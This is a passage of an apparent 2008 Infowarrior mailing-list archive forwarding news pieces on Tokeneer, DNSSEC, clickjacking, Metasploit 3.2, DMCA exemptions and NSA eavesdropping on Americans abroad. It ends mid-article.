Message-ID: <46218E86-41F1-4653-8DB3-4C6F4E8E50B6@infowarrior.org> http://www.adacore.com/home/gnatpro/tokeneer/ Project Summary In order to demonstrate that developing highly secure systems to the level of rigor required by the higher assurance levels of the Common Criteria is possible, the NSA (National Security Agency) asked Praxis High Integrity Systems to undertake a research project to develop part of an existing secure system (the Tokeneer System) in accordance with Praxis? Correctness by Construction development process. This development and research work has now been made available by the NSA to the software development and security communities in an effort to prove that it is possible to develop secure systems rigorously in a cost effective manner. The Tokeneer ID Station development project has demonstrated that the Praxis Correctness by Construction development process is capable to produce a high quality, low defect system in a cost effective manner following a process that conforms to the Common Criteria EAL5 requirements. The Tokeneer ID Station system?s key statistics are: * lines of code: 9939 * total effort (days): 260 * productivity (lines of code per day, overall): 38 * productivity (lines of code per day, coding phase): 203 * defects discovered since delivery: 1 With the aim of achieving EAL5 levels of assurance, we believe that the Correctness by Construction process can achieve EAL7. The proof activity we use in our Correctness by Construction process is sufficient for EAL7, which involves tool supported code proof but manual proof of the Specification and Design. The process can be tightened appropriately to meet the additional quality control requirements of EAL7 by using tools that provide fully integrated electronic support. < - > http://www.adacore.com/home/gnatpro/tokeneer/ From rforno at infowarrior.org Wed Oct 8 12:07:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 8 Oct 2008 08:07:56 -0400 Subject: [Infowarrior] - SUV sketch gets artist detained @ border Message-ID: Published October 04, 2008 10:00 pm - Woman was detained by Customs and Border Protection because of an SUV sketch she made for artwork. http://www.pressrepublican.com/homepage/local_story_278220015.html By LOHR McKINSTRY Staff Writer KEENE VALLEY -- Keene Valley resident Jerilea Zempel was detained at the U.S. border this summer because she had a drawing of a sport- utility vehicle in her sketchbook. U.S. Customs and Border Protection officers told Zempel they suspected her of copyright infringement. She was released after more than an hour in custody at the Houlton, Maine, port of entry from New Brunswick, Canada. Her release came only after she persuaded border guards she was an artist doing a project that involved a crocheted SUV as a statement against America's dependence on oil and love for big vehicles. SHROUDED CAR Zempel's adventure began when she was returning from the Cultural Capital Festival in Sackville, New Brunswick, where her submission was an SUV cozy on a rented Hyundai Santa Fe. "I wanted to turn an oversize, macho, gas-guzzling vehicle into a technological ghost by shrouding it in a white, fuzzy cover reminiscent of women's handiwork from another time, another place." After the festival, Zemple headed for home in her own Toyota Prius hybrid and stopped at the border crossing on Interstate 95 in Maine. "What happened when I re-entered the U.S. made me ponder what my lowly art project could mean in a larger political sphere. "And it gave me an idea for a title: the Homeland Security Blanket." SEARCH AT BORDER Zempel's passport showed she'd been to Africa, Australia, Central and South America, Mexico, Turkey and Europe in the last nine years. "U.S. citizens who've traveled to the places I've been need to be looked at. A half hour at the computer gave the agent cause to put me into another suspicious category, meriting a full car search. She (the agent) took my keys and went through my car. "After going through my (laptop) computer, digital camera, cell phone, business cards, suitcase, reading materials, boxes of yarn and crochet tools, she returned with my sketchbook. "I was taken to a room and told to sit on a bench with handcuffs at both ends. But they did not handcuff me." Zempel had drawn an SUV covered by a cozy, with its mirrors marked as "ears." "My sketchbook puzzled her," Zempel said. "It was a cartoon sketch. They couldn't understand what I was doing. She said, ??Just what were you doing in Canada? We think you're engaged in some kind of copyright infringement." She said she and the CBP agent then had a "lively discussion" over Zempel's status as an artist and a professor at Fordham University in New York City. "I had to spell Fordham for her. She left the room to see if she could find me on the college's Web site." While she was out, Zempel found her college ID and showed it to the agent when she came back. "Somehow being a college professor made it all OK. She said, ??Welcome back to the U.S.' I was allowed to leave." CIVIL RIGHTS Zemple said that before the incident she didn't know border guards could search computers and other digital devices "without reasonable cause ... I was surprised to learn all your civil rights are suspended. It was a form of intimidation." U.S. Rep. Zoe Lofgren (D-Calif.) recently introduced a bill that would prevent Customs and Border Protection officials from conducting border searches and seizures of laptops and other electronic devices when U.S. citizens return from international travel unless the agents have justifiable reason to do so. Customs and Border Protection spokesman Theodore Woo said he could not discuss the specifics of the interview process Zempel went through. "CBP officers may, at times, inspect a person's belongings to determine whether or not items are admissible or are illegal." Woo didn't say how a sketch of a car could trigger a border guard's suspicion of copyright infringement. But he did say agents are trained in trademark and copyright laws. "It's a part of a CBP officer's training. Time is set aside for intellectual-property-rights training." The agency's role is to keep the country's borders safe while at the same time enforcing many rules and regulations, he said. From rforno at infowarrior.org Wed Oct 8 12:10:12 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 8 Oct 2008 08:10:12 -0400 Subject: [Infowarrior] - It's DMCA exemption time! Message-ID: It's DMCA exemption time! - October 6, 2008 http://www.contentagenda.com/blog/1500000150/post/640034464.html Get those anti-circumvention exemptions ready kids! It's time for the Copyright Office's triennial review of Section 1201(a)(1) of the Digital Millennium Copyright Act, in which the Register of Copyrights makes recommendations to the Librarian of Congress about granting temporary exemptions to the ban on circumventing encryption on certain classes of works. The federal register notice is here. Congress added the triennial review to the DMCA as a fail-safe mechanism, in case it turned out that the blanket ban on circumvention was "unduly burdening" fair use of certain types of work. The exemptions are only good for three years, however, and must be reapplied for with each review. The last rulemaking, in 2006, resulted in six exemptions: 1. Audiovisual works included in the educational library of a college or university?s film or media studies department, when circumvention is accomplished for the purpose of making compilations of portions of those works for educational use in the classroom by media studies or film professors. 2. Computer programs and video games distributed in formats that have become obsolete and that require the original media or hardware as a condition of access, when circumvention is accomplished for the purpose of preservation or archival reproduction of published digital works by a library or archive. A format shall be considered obsolete if the machine or system necessary to render perceptible a work stored in that format is no longer manufactured or is no longer reasonably available in the commercial marketplace. 3. Computer programs protected by dongles that prevent access due to malfunction or damage and which are obsolete. A dongle shall be considered obsolete if it is no longer manufactured or if a replacement or repair is no longer reasonably available in the commercial marketplace. 4. Literary works distributed in ebook format when all existing ebook editions of the work (including digital text editions made available by authorized entities) contain access controls that prevent the enabling either of the book?s read-aloud function or of screen readers that render the text into a specialized format. 5. Computer programs in the form of firmware that enable wireless telephone handsets to connect to a wireless telephone communication network, when circumvention is accomplished for the sole purpose of lawfully connecting to a wireless telephone communication network. 6. Sound recordings, and audiovisual works associated with those sound recordings, distributed in compact disc format and protected by technological protection measures that control access to lawfully purchased works and create or exploit security flaws or vulnerabilities that compromise the security of personal computers, when circumvention is accomplished solely for the purpose of good faith testing, investigating, or correcting such security flaws or vulnerabilities. Written comments recommending exemptions are due in the Copyright Office December 2, 2008. A notice of proposed rulemaking will be issued later in December based on those recommendations, and final comments are due February 2, 2009. From rforno at infowarrior.org Thu Oct 9 01:19:00 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 8 Oct 2008 21:19:00 -0400 Subject: [Infowarrior] - Recovering Censored Text Using Photoshop and JavaScript Message-ID: <4E5970AF-D0C6-42D1-A8C4-4DAEA2BA4262@infowarrior.org> Recovering Censored Text Using Photoshop and JavaScript My friend Andrew recently posted a teaser for a new project he?s working on, but with part of the headline pixelated to obscure what the project actually is. My curiosity got the best of me and I decided to do what any self-respecting geek would do: write a program to figure out what the censored text said. Ultimately I failed to recover most of the censored text (except ?to?), so I had to cheat a little. The following video is the program running on a very similar image I created. This proves it works in ideal conditions, but needs some improvement to work in less than ideal cases. < - > http://tlrobinson.net/blog/?p=52 From rforno at infowarrior.org Thu Oct 9 01:25:33 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 8 Oct 2008 21:25:33 -0400 Subject: [Infowarrior] - Feds Start Moving on Net Security Hole Message-ID: <2381780D-F9E1-4FF3-BF92-BB3C05857142@infowarrior.org> Feds Start Moving on Net Security Hole By Ryan Singel EmailOctober 08, 2008 | 8:05:21 PMCategories: Cybersecurity, Hacks and Cracks http://blog.wired.com/27bstroke6/2008/10/feds-take-step.html Starting Thursday morning, the U.S. government is seeking comment on who should create and vouch for the internet's most crucial document -- the root zone file -- that serves as the cornerstone of the system that lets users get to websites and emails find their way to inboxes. The non-profit ICANN, the for-profit Verisign and the Commerce Department's National Telecommunications and Information Administration all have different answers to what is a long-standing, and geopolitically charged internet governance question. But the only thing that matters for the security of the internet is the speed that they answer the question, according to domain-name system expert Paul Vixie. "We've got to get the root signed, it does not matter by whom," Vixie said by e-mail. "It's necessary simply that it be done, by someone, and that we stop anyone from arguing about whether letting someone hold the root key would make them king." At issue is a massive net security hole that security researcher Dan Kaminsky discovered in early 2008 that was temporarily patched in July. If not given a complete fix soon, the vulnerability could allow so much net fraud that it would strip all trust from the internet users that any website they were visiting is the genuine article, experts say. The only known complete fix is DNSSEC -- a set of security extensions for name servers. (That said, there are other effective defenses and OpenDNS, for one, protects users now.) Those extensions cryptographically sign DNS records, ensuring their authenticity like a wax seal on an letter. The push for DNSSEC has been ramping up over the last few years, with four regions -- including Sweden (.se) and Puerto Rico (.pr) -- already securing their own domains with DNSSEC. Four of the largest top-level domains -- .org, .gov, .uk and .mil, are not far behind, while the entire U.S. government will comply for its websites starting in January 2009. But because DNS servers work in a giant hierarchy, deploying DNSSEC successfully also requires having someone trustworthy sign the so- called "root file" with a public-private key. Otherwise, an attacker can undermine the entire system at the root level, like a criminal having taken over control of the Supreme Court justices. With a properly signed root file, your browser can repeatedly ask, "How do I know this is the real answer?", until the question reaches the root file, which says, "Because I vouch for it." Bill Woodcock, one of the net's foremost experts on network security, blasted the NTIA earlier this summer for moving too slowly on DNSSEC, while the government protested that it was moving at the right speed. "If the root isn't signed, then no amount of work that responsible individuals and companies do to protect their domains will be effective," Woodcock said in July. "You have to follow the chain of signatures down from the root to the top-level domain to the user's domain. If all three pieces aren't there, the user isn't protected." On Tuesday, NTIA's Acting Assistant Secretary Meredith Baker told international net leaders that it was opening comment on DNSSEC and root zone signing this week. "In light of existing and emerging threats, the time is ripe to consider long-term solutions, such as DNSSEC," Baker said. "As we consider deployment of DNSSEC, particularly at the root zone level, it is critical that all the interested stakeholders have the opportunity to express their views on the matter, as deployment of DNSSEC would represent one of the most significant changes to the DNS infrastructure since its inception." That's where the politics comes in. The DNS root is controlled by the NTIA, which divides the responsibility for the creation, editing and distribution of the root file between itself, ICANN and the for-profit Verisign, which runs the .com domain. Currently companies that manage top-level domains like .com submit changes to ICANN, which then sends them to NTIA for approval, before they're forwarded to VeriSign. VeriSign actually edits the root file and publishes it to the 13 root servers around the world. Now in a previously unpublished draft (.pdf) of the final proposal given to the government (.pdf), ICANN says its best qualified for the root signing job and proposes to take over the job of approving the changes, editing the root file, and signing it, then handing it off to VeriSign for trusted distribution. But changing that system could be perceived as reducing U.S. control over the net -- a touchy geopolitical issue. ICANN is often considered by Washington politicians to be akin to the United Nations. VeriSign, often criticized for trying to exercise too much control over the net, counter-proposes that its role be enlarged. Under its proposal (.pdf), the root zone file will be signed using keys it distributes to the root server operators and if enough of them sign the file, then it is considered official. The root-zone file, which contains entries for the 300 or so top-level domains such as .gov and .com, changes almost every day, but the number of changes to the file will likely increase radically in the near future, since ICANN decided in June to allow an explosion of new top-level domain names. Verisign and the NTIA declined to comment ahead of the proceedings, while ICANN did not return a call for comment. Public comments will be taken on the Notice of Inquiry that will be published Thursday morning on the NTIA's website. From rforno at infowarrior.org Thu Oct 9 12:19:40 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 9 Oct 2008 08:19:40 -0400 Subject: [Infowarrior] - Adobe warns Clickjackers could take over your web cam Message-ID: <7130F77A-999E-4D04-B92F-A2FB61C3238B@infowarrior.org> Adobe warns Clickjackers could take over your web cam Put some clothes on, at least http://www.theinquirer.net/gb/inquirer/news/2008/10/09/clickjacking By Emma Hughes: Thursday, 09 October 2008, 11:12 AM YOU'VE HEARD of "hijacking" and more certainly the word " click", but you may not have heard of the most ridiculous word blend of the day, " clickjacking". But you should be very afraid. The big red alarm has been sounded, as clickjacking - a malicious attack on web servers - is spreading, and spreading fast insecurity fear-mongers are warning. The clickjacking technique is yet another simple but ingenious way of revealing all to a prying hacker. This attack works by directing a user to a pre-determined webpage chosen by the hacker, when the user clicks on a seemingly innocent link - the hacker is able to gain control of all number of things this way including the webcam and the microphone. Clickjacking, (we'll keep repeating it so it sounds real) has been identified as a vulnerability on many browsers, namely Adobe Flash Player, Firefox, Internet Explorer, Opera, Safari and Google Chrome. Giorgio Maone, author of Firefox extension, NoScript told Newsfactor, "Clickjacking is a very simple attack to build, and now that the details are out, any script kid can try it successfully." Maone further laments that unfortunately there is no way of tracking just how many of these attacks are out there, as there are infinite ways to implement such an attack. Clickjacking was supposed to have been revealed last month at the Open Web Application Security Project NYC AppSec conference by Robert Hansen of SecTheory and Jeremiah Gorssman of WhiteHat Security who discovered but concealed this threat giving Adobe and other browsers a chance to come up with a fix. However, a fix they did not find. Adobe has instead released security information for its Flash Player which blocks access to the webcam and camera, but due to the many variants of this attack it is seemingly impossible to deter altogether. If someone does manage to come up with a general browser fix, it won't be any time soon predicts Maone. ? From rforno at infowarrior.org Thu Oct 9 12:20:42 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 9 Oct 2008 08:20:42 -0400 Subject: [Infowarrior] - Metasploit 3.2 Offers More 'Evil Deeds' Message-ID: www.internetnews.com/security/article.php/3776831 Back to Article Metasploit 3.2 Offers More 'Evil Deeds' By Sean Michael Kerner October 8, 2008 TORONTO -- Hacking into systems (albeit for testing purposes) is apparently getting easier with the upcoming open source Metasploit 3.2 framework, according to its creator. During a packed presentation at that SecTor conference here yesterday, Metasploit creator H. D. Moore detailed some of the new features in the upcoming Metasploit 3.2 release. They include names such as Browser AutoPwn, Metasploit in the Middle and the Evil Wireless Access Point. "For http we do a whole bunch of evil things to a browser," Moore said, addressing an audience of security and networking professionals from sectors such as government and leading corporations. Many attend the conference in order to stay up to date on vulnerability assessments and how hackers exploit networks. Metasploit is an open source attack framework first developed by Moore in 2003. With the Metasploit 3.0 release, the project has moved to an all Ruby programming base, which Moore credits with quickening development and exploits. Take the context map payload feature, which encodes attack shellcode. Moore claimed that the new feature will make it even more difficult to detect attack code. Getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library call PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points. It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit. Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection. Moore boasted that he is using the same resources that the anti-virus vendors are using to identify virus signatures to ensure that the Metasploit EXE template is not identified. If that wasn't enough, Metasploit 3.2 will include a new super weapon that will make exploiting browsers a trivial matter. The new Browser Autopwn feature is a client side auto attack system that will fire up exploits automatically against a user's browser with the goal of providing a shell into the browser. Man in the middle attacks are also addressed in the package features. Moore explained that Metasploit in the Middle Feature puts the attack framework in between the users and their intended location. The man in the middle approach could be used to spoof DNS or to create a fake access point. "It will abuse the HTTP security model, stealing cookies and saved form data," Moore said. And if that's not enough to give security researchers a taste of the latest developments in security vulnerabilities, there is the Evil Wireless Access Point feature. Moore said it can create an access point that consumes all other access points around it. Adding insult to evil, it has the ability to spoof any access point that is already on a user's preferred access point list. Browsers beware. Last but certainly not least in this testing culture, Moore announced that Metasploit 3.2 now has full IPv6 support. "The US Government has a mandate for IPv6 support, so there is at least one target there for you," Moore said. Let the testing begin. From rforno at infowarrior.org Thu Oct 9 17:44:48 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 9 Oct 2008 13:44:48 -0400 Subject: [Infowarrior] - Inside Account of U.S. Eavesdropping on Americans Message-ID: ABC News Exclusive: Inside Account of U.S. Eavesdropping on Americans U.S. Officers' "Phone Sex" Intercepted; Senate Demanding Answers By BRIAN ROSS, VIC WALTER, and ANNA SCHECTER http://abcnews.go.com/print?id=5987804 Oct. 9, 2008? Despite pledges by President George W. Bush and American intelligence officials to the contrary, hundreds of US citizens overseas have been eavesdropped on as they called friends and family back home, according to two former military intercept operators who worked at the giant National Security Agency (NSA) center in Fort Gordon, Georgia. The chairman of the Senate Intelligence Committee, Jay Rockefeller (D- WV), called the allegations "extremely disturbing" and said the committee has begun its own examination. "We have requested all relevant information from the Bush Administration," Rockefeller said Thursday. "The Committee will take whatever action is necessary." "These were just really everyday, average, ordinary Americans who happened to be in the Middle East, in our area of intercept and happened to be making these phone calls on satellite phones," said Adrienne Kinne, a 31-year old US Army Reserves Arab linguist assigned to a special military program at the NSA's Back Hall at Fort Gordon from November 2001 to 2003. Kinne described the contents of the calls as "personal, private things with Americans who are not in any way, shape or form associated with anything to do with terrorism." She said US military officers, American journalists and American aid workers were routinely intercepted and "collected on" as they called their offices or homes in the United States. Watch "World News Tonight with Charles Gibson" and "Nightline" for more of Brian Ross' exclusive report. Another intercept operator, former Navy Arab linguist, David Murfee Faulk, 39, said he and his fellow intercept operators listened into hundreds of Americans picked up using phones in Baghdad's Green Zone from late 2003 to November 2007. "Calling home to the United States, talking to their spouses, sometimes their girlfriends, sometimes one phone call following another," said Faulk. The accounts of the two former intercept operators, who have never met and did not know of the other's allegations, provide the first inside look at the day to day operations of the huge and controversial US terrorist surveillance program. "There is a constant check to make sure that our civil liberties of our citizens are treated with respect," said President Bush at a news conference this past February. But the accounts of the two whistleblowers, which could not be independently corroborated, raise serious questions about how much respect is accorded those Americans whose conversations are intercepted in the name of fighting terrorism. US Soldier's 'Phone Sex' Intercepted, Shared Faulk says he and others in his section of the NSA facility at Fort Gordon routinely shared salacious or tantalizing phone calls that had been intercepted, alerting office mates to certain time codes of "cuts" that were available on each operator's computer. "Hey, check this out," Faulk says he would be told, "there's good phone sex or there's some pillow talk, pull up this call, it's really funny, go check it out. It would be some colonel making pillow talk and we would say, 'Wow, this was crazy'," Faulk told ABC News. Faulk said he joined in to listen, and talk about it during breaks in Back Hall's "smoke pit," but ended up feeling badly about his actions. "I feel that it was something that the people should not have done. Including me," he said. In testimony before Congress, then-NSA director Gen. Michael Hayden, now director of the CIA, said private conversations of Americans are not intercepted. "It's not for the heck of it. We are narrowly focused and drilled on protecting the nation against al Qaeda and those organizations who are affiliated with it," Gen. Hayden testified. He was asked by Senator Orrin Hatch (R-UT), "Are you just doing this because you just want to pry into people's lives?" "No, sir," General Hayden replied. Asked for comment about the ABC News report and accounts of intimate and private phone calls of military officers being passed around, a US intelligence official said "all employees of the US government" should expect that their telephone conversations could be monitored as part of an effort to safeguard security and "information assurance." "They certainly didn't consent to having interceptions of their telephone sex conversations being passed around like some type of fraternity game," said Jonathon Turley, a constitutional law professor at George Washington University who has testified before Congress on the country's warrantless surveillance program. "This story is to surveillance law what Abu Ghraib was to prison law," Turley said. Listening to Aid Workers NSA awarded Adrienne Kinne a NSA Joint Service Achievement Medal in 2003 at the same time she says she was listening to hundreds of private conversations between Americans, including many from the International Red Cross and Doctors without Borders. "We knew they were working for these aid organizations," Kinne told ABC News. "They were identified in our systems as 'belongs to the International Red Cross' and all these other organizations. And yet, instead of blocking these phone numbers we continued to collect on them," she told ABC News. A spokesman for Doctors Without Borders, Michael Goldfarb, said: "The abuse of humanitarian action through intelligence gathering for military or political objectives, threatens the ability to assist populations and undermines the safety of humanitarian aid workers." Both Kinne and Faulk said their military commanders rebuffed questions about listening in to the private conversations of Americans talking to Americans. "It was just always, that , you know, your job is not to question. Your job is to collect and pass on the information," Kinne said. Some times, Kinne and Faulk said, the intercepts helped identify possible terror planning in Iraq and saved American lives. "IED's were disarmed before they exploded, that people who were intending to harm US forces were captured ahead of time," Faulk said. NSA job evaluation forms show he regularly received high marks for job performance. Faulk left his job as a newspaper reporter in Pittsburgh to join the Navy after 9/11. Kinne says the success stories underscored for her the waste of time spent listening to innocent Americans, instead of looking for the terrorist needle in the haystack. "By casting the net so wide and continuing to collect on Americans and aid organizations, it's almost like they're making the haystack bigger and it's harder to find that piece of information that might actually be useful to somebody," she said. "You're actually hurting our ability to effectively protect our national security." The NSA: "The Shadow Factory" Both former intercept operators came forward at first to speak with investigative journalist Jim Bamford for a book on the NSA, "The Shadow Factory," to be published next week. "It's extremely rare," said Bamford, who has written two previous books on the NSA, including the landmark "Puzzle Palace" which first revealed the existence of the super secret spy agency. "Both of them felt that what they were doing was illegal and improper, and immoral, and it shouldn't be done, and that's what forces whistleblowers." A spokesman for General Hayden, Mark Mansfield, said: "At NSA, the law was followed assiduously. The notion that General Hayden sanctioned or tolerated illegalities of any sort is ridiculous on its face." The director of the NSA, Lt. General Keith B. Alexander, declined to directly answer any of the allegations made by the whistleblowers. In a written statement, Gen. Alexander said: "We have been entrusted to protect and defend the nation with integrity, accountability, and respect for the law. As Americans, we take this obligation seriously. Our employees work tirelessly for the good of the nation, and serve this country proudly." Click Here for the Investigative Homepage. Copyright ? 2008 ABC News Internet Ventures From rforno at infowarrior.org Fri Oct 10 12:31:52 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 10 Oct 2008 08:31:52 -0400 Subject: [Infowarrior] - Comment: Bad investment practices Message-ID: <3D3F7473-87BA-4E33-BDFF-0F9CE680AD88@infowarrior.org> Some Friday Food For Thought, since the economy is (rightly) on everyone's mind these days: I got the annual report (ending June 2008) for a UBS global fund I've got a small investment in the other day. To their credit, they break down "what worked" and "what didn't work" in rather clear and simple English. In fact, the entire report is pretty darn readable, which was quite nice. However, under the "what didn't work", this really got my attention: < - > Subheading: "Within the US equity component an overweight to financials?particularly banks?and an underweight to energy hurt Fund performance." ....and then the.first line of the descriptive paragraph to follow: "Though financial stocks did not perform as well as we expected, we continue to overweight them." (p26) < - > I'm sorry -- but doesn't that sound like bad investing style? As one of my favorite commodity traders is prone to say, "do more of what is working, and less of that which is not." If after a few months the trade isn't working, common sense says GET OUT and move to what is working! But it gets better, for the next sentence of the paragraph reads: "In general, we are finding very attractive valuations within financials." Huh??? We've got UBS (and I'm sure tons of other brokers or fund advisors) basing their fund investments on valuations in a market where the data used to create such valuations is not to be trusted (does anyone know what the value of anything is worth this year, or when more surprise writedowns will be announced?) This past year, valuation models have proven utterly worthless. I said so to friends back in May. Then, when their analysis and decisions on where to invest don't work, rather than adjust fire to move into what IS working they stick to their guns and overweight themselves to that losing sector/position/ trade anyway. Part of this is how the "system" of mutual funds works, I understand that. But still ..... hold and hope, anyone? As one of millions of invest---er, victims of such practices, I'm reminded of those old trading jokes about brokerages and managed funds -- "We earn wealth the old fashioned way....we steal it." Or, perhaps more appropriately, where the definition of 'asset allocation' or' 'wealth management' really means that the brokerage is able to effectively "allocate (or manage) wealth from your account to ours." Bear that in mind when watching ads for brokerages or Wealth Management firms ... remember, they get paid regardless if you make or lose money! (Disclosure: Although I am not a huge fan of mutual funds, I do own several as part of my overall retirement portfolio - some have done well, some have not. C'est life.) If I didn't welcome this paper loss to offset trading gains elsewhere this year, I'd be pretty livid. As it is, though, I'm pretty torked at the philosophy behind this (and I'm sure many other) mutual funds who "stick to their guns" at all costs.....makes a pretty darn good case to do your own homework and research on your own investments - whatever they may be, stocks, bonds, funds, etfs, etc -- for at least we "little people" might be (or are) more flexible in changing our investing style with the current environment. That's part of our ability as individual investors and something made much more convenient for us thanks to the Internet and discounted online trading -- namely, being nimble, adaptable, and flexible, which is something the "big guys" can't be so easily. Put another way, in terms of investing flexibility, if the "big guys" are the Titanic (ha!), we're the high-performance racer. Embrace that power to quickly navigate around the iceberg, take a breath to clear your head, and come back to look for and pick up survivors that will reward you handsomely down the road! Thus endeth the lesson. :) Of course, in full disclosure, I'm partly to blame for this -- three years ago I broke my own rule and bought into a mutual fund run by my broker. I've done that twice before over my career, and been burned twice. Never again! Have a great weekend, all. -rick (c) 2008 Richard Forno. Permission granted to reproduce in entirety with credit given to author From rforno at infowarrior.org Sat Oct 11 02:25:29 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 10 Oct 2008 22:25:29 -0400 Subject: [Infowarrior] - Inside NSA's Operation Highlander Message-ID: Inside Operation Highlander: the NSA's Wiretapping of Americans Abroad By Kim Zetter October 10, 2008 | 6:06:27 PM http://blog.wired.com/27bstroke6/2008/10/kinne.html A top secret NSA wiretapping facility in Georgia accused of spying on Americans illegally was hastily staffed with inexperienced reservists in the months following September 11, where they worked under conflicting orders and with little supervision, according to three former workers at the spy complex. "Nobody knew exactly what the heck we were doing," said a former translator for the project, code named Highlander, who spoke on condition of anonymity. "We were figuring out the rules as we were going along." Former Army Reserve linguist Adrienne Kinne, who worked at the facility at Fort Gordon, won new attention this week for her year-old claim that she intercepted and transcribed satellite phone calls of American civilians in the Middle East for the National Security Agency. Senate intelligence committee chair Jay Rockefeller (D-W.Va.) opened a probe into the alleged abuses after ABC News reported on them Thursday. Threat Level spoke with Kinne extensively last year about the alleged systematic surveillance of Americans and others operating in the Middle East following the 9/11 attacks. She provided a number of details about some of the calls and how the operation was conducted. Aid workers and journalists were specifically targeted in the program, and their phone numbers were added to a "priority list", Kinne said last year. Among those under surveillance were workers from nongovernmental organizations such as Doctors Without Borders, the International Committee of the Red Cross, and the United Nations Developing Countries Program, as well as journalists staying in Baghdad at the time of the Iraq invasion. The intercepted calls included conversations among American, British, Australian and other civilian foreign nationals in the Middle East, as well as conversations between aid workers and journalists in the Middle East and their family members in the United States. "If it was happening then I'm sure it's happening now, and who knows on what scale," Kinne said. "That's the thing that really bothers me." But at the time we were unable to confirm her account of the spying. Two coworkers of Kinne's, who spoke with Threat Level on condition of anonymity, conceded that the group operated under ambiguous rules and with poor supervision, but insisted no deliberate eavesdropping on Americans occurred. Now a second former Arabic linguist with the Navy has corroborated her claims to ABC, and to NSA expert James Bamford, who includes the story in his upcoming book Shadow Factory. If the allegations are true, it would seem to indicate that warrantless spying of Americans approved by President Bush following 9/11 expanded rapidly beyond U.S. borders to citizens overseas, notwithstanding United States Signals Intelligence Directive 18, or USSID 18 -- an NSA rule that bars overseas surveillance of Americans without authorization and probable cause. Kinne first raised her allegations in July 2007 to a blogger named David Swanson whom she'd encountered after an anti-war protest. Threat Level contacted her a couple of days later and spoke with her a number of times over several months. Kinne, who is 31, served in the U.S. Army Reserves as a sergeant and an Arabic linguist from October 2001 to August 2003 at a U.S. Army Signal Center at Fort Gordon, Georgia, which operated as a listening post for the National Security Agency. Kinne had served active duty in the U.S. Army as an intelligence linguist with a top secret SCI security clearance from 1994 to 1998, and was in the reserves on September 11, 2001. In desperate need of Arabic translators with classified clearances, the Army called Kinne's reserve battalion for active duty. Kinne served with the 201st Military Intelligence battalion, which is part of the 513th Military Intelligence brigade. Kinne said that during the time she was at Fort Gordon, the government was intercepting and listening to phone calls made by American citizens and allies working for aid organizations and media outlets. At first, Kinne didn't think they were doing anything wrong because in mid-2002, several months after the surveillance began, a supervisor told her group of linguists and analysts that they had received a "waiver" that allowed them to intercept and listen to the conversations of Americans. The waiver also gave them permission to spy on British, Canadian and Australian citizens Kinne said. Under federal law, such a waiver would usually require special national security circumstances ?- such as an imminent threat of death or attack. But Kinne said the people whose conversations she targeted didn't discuss information of a military or terrorist nature, and the interceptions occurred over the entire Middle East ?- not just in war zones. The surveillance was still going on when Kinne left active reserve duty in August 2003. Kinne's mission at Fort Gordon, which was given the name Highlander, intercepted only communication sent through satellite phones, which included faxes. This represented a change from her active duty in the 1990s when her group had intercepted only live radio transmissions involving military targets in the Middle East. The operation that began in 2001 involved region-wide interceptions, which meant that satellite calls of businessmen, journalists and other civilians were sometimes vacuumed up with everything else. Generally, when incidental interception of Americans occurs, there are procedures for handling the intercepts. Under USSID 18, recordings of such calls are supposed to be abandoned and destroyed when a U.S. citizen is identified. The only exceptions to this rule are when the attorney general affirms that the surveillance target is believed to be an agent of a foreign power, or the purpose of the collection is to acquire "significant foreign intelligence information." Kinne's description of the interceptions, however, indicated that U.S. aid workers and journalists were routinely targeted without cause. To illustrate that contrast, Kinne recalled a conversation intercepted by her army intelligence unit in 1997, in which one of the parties to the call mentioned the name of a U.S. politician who was coming to the Middle East for a visit. Under USSID 18, the names of members of the U.S. legislative branch cannot appear in intelligence reports without special authorization, and Kinne said her group deleted every record they collected that mentioned the politician's name. William Weaver, who worked in the U.S. Army signals intelligence for eight years in Berlin and Augsberg, Germany, concurred with her assessment of how seriously USSID 18 was regarded. "The way USSID 18 was treated by us was that it came down from God and was sacrosanct," said Weaver, who is now an assistant professor of political science at the University of Texas, El Paso. "We were told at training and many times after that, that if you violated USSID 18 you could spend the rest of your life in prison. The mindset was that you do not intercept U.S. citizens. And the minute you recognized that you intercepted, you immediately reported up the chain of command." Kinne said everything changed shortly after her unit intercepted a call in early to mid-2002 between British and U.S. aid workers. The two were discussing day-to-day work details when the British worker told the American, "You should be careful about what you're saying because the Americans are listening to us." The American responded that USSID 18 barred U.S. authorities from spying on the communication of Americans, so the British worker had nothing to worry about. Kinne said her supervisor, Chief Warrant Officer John Berry, and others were livid. "[They] acted as if he was betraying some hugely intense national secret to a foreigner," she said. "So that's when they were like, 'We need to be able to listen to them'." Shortly thereafter, she said, Berry informed her that they had received a waiver from USSID 18. She said it was communicated verbally during one of her shifts."They never showed us anything in writing," said Kinne. "But we never expected to get anything in writing." Berry, who now works as a reporter for the Press-Enterprise in Riverside, California, hung up the phone on Threat Level at the first mention of Kinne's name. Kinne said that in the nearly two years she was monitoring conversations, her group processed between 300 and 500 calls a day in numerous languages, including Farsi, Dari, Tagalog, Japanese, Chinese and Russian. Between 10-20 percent of the calls she monitored involved English-speakers, which included Americans, Canadians and British citizens. Nearly 99 percent of the calls she monitored were non- military related. Relatively few of the calls that came in were in Arabic. The calls were intercepted and digitally recorded by members of the Army's military intelligence unit in Kuwait then sent to Fort Gordon. The system would pick up conversations for whatever phone numbers the military programmed into its interception system, though Kinne assumed the system also randomly swept satellite calls for untargeted numbers, since so many calls were recorded for numbers whose owners were unknown. For the first couple of months Kinne and her colleagues didn't know the identity of the people connected to the phone numbers they monitored. "At that point in time, we were just given numbers and we ... were still sorting out who belonged to what," she said. "That's why we initially started collecting Americans and other nationals because we didn't know whose number belonged to whom." Once they identified speakers, they typed the person's name or organization into the system, so that when a conversation involving that number was intercepted again, the name appeared on their computer 